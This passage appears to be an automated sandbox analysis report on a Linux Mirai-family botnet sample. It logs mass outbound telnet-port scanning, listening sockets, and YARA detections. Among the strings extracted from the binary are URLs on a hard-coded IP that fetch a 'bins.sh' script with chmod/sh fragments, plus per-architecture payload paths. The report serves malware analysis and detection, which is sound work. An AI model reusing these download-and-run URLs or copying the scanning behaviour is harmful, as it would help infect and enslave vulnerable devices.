                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 217.32.188.83:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 24.190.110.102:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 111.68.189.227:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 218.159.156.100:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 153.252.227.19:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 159.145.13.112:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 34.154.33.5:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 149.230.11.131:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 220.29.190.210:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 93.7.65.54:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 43.47.4.34:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 4.114.233.116:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 35.20.39.149:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 22.155.20.160:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 95.159.241.222:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 68.132.18.215:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.92.230.148:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 103.14.189.198:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 13.219.198.234:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 213.59.85.184:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 6.156.160.233:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 184.105.245.59:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 62.147.108.108:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 163.46.95.120:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 144.224.134.141:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 44.221.176.98:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 144.236.230.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.204.198.92:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 130.81.188.27:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 72.134.228.140:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 110.40.139.181:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 63.33.33.186:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 109.225.190.151:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.26.170.246:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.255.137.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 136.69.83.28:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 137.91.218.69:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 71.149.183.47:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 221.98.96.119:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.151.214.172:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 49.128.85.136:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 217.118.38.221:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 219.95.216.34:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 86.202.217.62:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 108.19.39.9:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 195.115.43.129:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 15.245.147.220:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 146.211.163.45:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.184.49.194:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 153.243.238.151:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 216.138.246.34:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 179.238.119.27:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 31.142.211.57:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 95.2.150.144:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 212.75.168.237:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 142.239.8.100:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 184.62.190.173:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 180.92.213.66:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 130.0.142.106:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 2.8.51.29:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 194.8.251.247:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 215.30.57.251:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 11.246.233.117:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 33.120.105.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 69.204.84.56:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 2.216.71.173:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 143.172.162.114:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 197.218.51.244:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 54.202.129.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 47.232.55.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 48.8.69.166:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 194.239.65.177:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 87.96.82.81:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.186.212.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 183.195.159.85:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 210.55.101.70:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 28.246.198.208:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 186.24.104.107:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 200.192.107.126:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 145.206.28.233:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 53.219.194.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.149.218.101:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 15.205.116.206:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 58.13.125.234:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 53.92.62.168:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 204.254.15.63:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 157.237.158.163:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 186.142.44.175:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 106.174.11.225:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 43.79.181.20:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 183.10.177.182:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 209.185.184.146:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 111.181.106.54:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 6.243.89.180:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 218.203.156.86:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 62.15.246.161:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 113.137.66.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 73.15.72.162:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 119.209.114.10:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 161.38.116.20:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 74.36.167.105:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 145.156.55.65:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.68.32.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 73.215.155.240:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 146.150.211.182:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 193.91.250.37:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 111.224.89.118:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 147.78.199.244:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 164.97.12.204:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 215.139.58.222:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 38.216.211.134:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 14.203.154.155:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 162.42.93.164:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 194.238.91.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.24.100.124:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 88.76.3.129:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 104.241.52.150:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 51.24.248.235:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 8.55.77.225:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 2.244.225.52:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 204.99.198.43:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 222.214.206.114:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 149.253.249.160:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 211.217.96.198:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 87.7.129.203:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 54.231.116.195:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 17.83.130.29:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 67.133.149.78:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 217.246.92.79:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 146.214.82.27:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 222.116.246.141:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 178.202.71.66:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 33.16.111.96:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 137.72.92.24:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 191.18.193.11:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 169.201.72.251:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 123.2.241.121:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 33.210.137.49:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 19.92.24.162:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 193.31.81.140:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 51.78.168.255:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 121.144.9.32:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 194.71.248.224:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 69.132.156.170:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 200.252.235.157:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 57.185.154.118:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 54.238.136.69:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 71.181.250.38:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 35.177.160.132:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 95.21.179.110:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 87.233.42.210:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 67.86.102.35:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 38.253.111.216:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 91.24.87.235:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 181.144.73.6:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 160.207.76.13:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 198.41.202.117:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 1.207.81.25:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 18.249.120.175:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 59.160.192.183:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 138.87.102.134:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 68.223.99.47:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 36.253.137.135:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 100.29.100.139:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 90.121.152.35:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 177.161.91.168:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 142.208.96.111:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 72.45.138.189:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 27.178.88.43:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 94.229.39.109:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 35.88.202.245:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 15.115.56.239:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 137.42.156.94:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 216.235.183.205:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.18.43.102:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 30.168.196.202:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 69.2.45.42:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 52.155.168.112:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 155.89.83.5:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 63.127.66.79:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 163.167.99.2:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 160.44.184.30:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 124.226.194.188:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 77.16.110.20:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 27.220.108.243:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 36.240.239.99:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 6.11.96.40:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 208.189.233.196:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 72.91.145.154:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 203.241.81.29:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 4.115.113.213:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 188.204.229.231:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 34.40.164.167:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 220.161.113.151:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 170.16.94.32:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 100.58.59.245:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 63.22.64.75:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 19.185.237.169:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 171.178.107.23:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 168.156.225.21:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 108.72.29.70:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 185.76.145.141:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 167.159.68.161:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 67.133.197.181:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 55.123.103.31:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 34.125.96.120:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 200.162.163.187:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 151.31.234.193:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 12.246.123.86:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 198.135.79.90:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 146.210.95.158:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 170.46.225.131:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 87.95.53.213:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 150.127.100.156:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 174.163.164.130:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 185.225.177.92:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 56.107.217.239:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 193.183.2.252:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 97.224.238.65:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 131.200.117.9:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 183.63.111.183:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 20.228.98.12:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 166.218.161.78:2323
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 65.139.153.122:2323
                  Source: global trafficTCP traffic: 192.168.2.20:60872 -> 38.73.253.173:52869
                  Source: global trafficTCP traffic: 192.168.2.20:12451 -> 60.76.190.119:2323
                  Source: /tmp/robinbot_sample2 (PID: 9457)Socket: 0.0.0.0::23Jump to behavior
                  Source: /tmp/robinbot_sample2 (PID: 9457)Socket: 0.0.0.0::0Jump to behavior
                  Source: /tmp/robinbot_sample2 (PID: 9457)Socket: 0.0.0.0::80Jump to behavior
                  Source: unknownTCP traffic detected without corresponding DNS query: 201.164.126.60
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.143.70.145
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.223.20.145
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.122.155.229
                  Source: unknownTCP traffic detected without corresponding DNS query: 72.255.166.151
                  Source: unknownTCP traffic detected without corresponding DNS query: 148.192.136.247
                  Source: unknownTCP traffic detected without corresponding DNS query: 48.1.144.59
                  Source: unknownTCP traffic detected without corresponding DNS query: 178.229.192.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 139.162.255.34
                  Source: unknownTCP traffic detected without corresponding DNS query: 22.116.236.214
                  Source: unknownTCP traffic detected without corresponding DNS query: 117.137.45.223
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.94.182.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.138.140.219
                  Source: unknownTCP traffic detected without corresponding DNS query: 21.111.165.4
                  Source: unknownTCP traffic detected without corresponding DNS query: 67.213.190.126
                  Source: unknownTCP traffic detected without corresponding DNS query: 142.161.183.24
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.241.3.142
                  Source: unknownTCP traffic detected without corresponding DNS query: 147.45.175.49
                  Source: unknownTCP traffic detected without corresponding DNS query: 212.146.132.224
                  Source: unknownTCP traffic detected without corresponding DNS query: 130.98.181.182
                  Source: unknownTCP traffic detected without corresponding DNS query: 215.64.153.158
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.38.183.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.177.52.165
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.2.92.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.60.240.166
                  Source: unknownTCP traffic detected without corresponding DNS query: 71.198.217.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 88.202.48.190
                  Source: unknownTCP traffic detected without corresponding DNS query: 200.142.244.13
                  Source: unknownTCP traffic detected without corresponding DNS query: 143.139.229.146
                  Source: unknownTCP traffic detected without corresponding DNS query: 29.125.169.149
                  Source: unknownTCP traffic detected without corresponding DNS query: 219.192.100.9
                  Source: unknownTCP traffic detected without corresponding DNS query: 221.199.235.83
                  Source: unknownTCP traffic detected without corresponding DNS query: 47.117.49.146
                  Source: unknownTCP traffic detected without corresponding DNS query: 19.125.253.88
                  Source: unknownTCP traffic detected without corresponding DNS query: 27.33.154.185
                  Source: unknownTCP traffic detected without corresponding DNS query: 67.189.248.199
                  Source: unknownTCP traffic detected without corresponding DNS query: 206.190.203.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.156.230.252
                  Source: unknownTCP traffic detected without corresponding DNS query: 221.40.44.83
                  Source: unknownTCP traffic detected without corresponding DNS query: 16.106.81.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 138.198.61.41
                  Source: unknownTCP traffic detected without corresponding DNS query: 118.147.239.21
                  Source: unknownTCP traffic detected without corresponding DNS query: 120.59.254.200
                  Source: unknownTCP traffic detected without corresponding DNS query: 42.86.252.250
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.140.9.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 155.71.68.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 119.109.18.136
                  Source: unknownTCP traffic detected without corresponding DNS query: 132.217.89.51
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.255.62.29
                  Source: unknownTCP traffic detected without corresponding DNS query: 79.143.105.94
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bin.sh;chmod
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh;
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh;$
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh;chmod
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh;sh
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/bins.sh;sh$
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/mips
                  Source: robinbot_sample2String found in binary or memory: http://176.97.210.195/mipsel
                  Source: robinbot_sample2String found in binary or memory: http://purenetworks.com/HNAP1/
                  Source: robinbot_sample2String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: robinbot_sample2String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

                  System Summary

                  barindex
                  Source: robinbot_sample2, type: SAMPLEMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                  Source: robinbot_sample2, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                  Source: 9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                  Source: 9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                  Source: 9459.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                  Source: 9459.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                  Source: 9446.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
                  Source: 9446.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
                  Source: robinbot_sample2, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                  Source: robinbot_sample2, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
                  Source: 9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
                  Source: 9457.1.00007fddd7163000.00007fddd7183000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
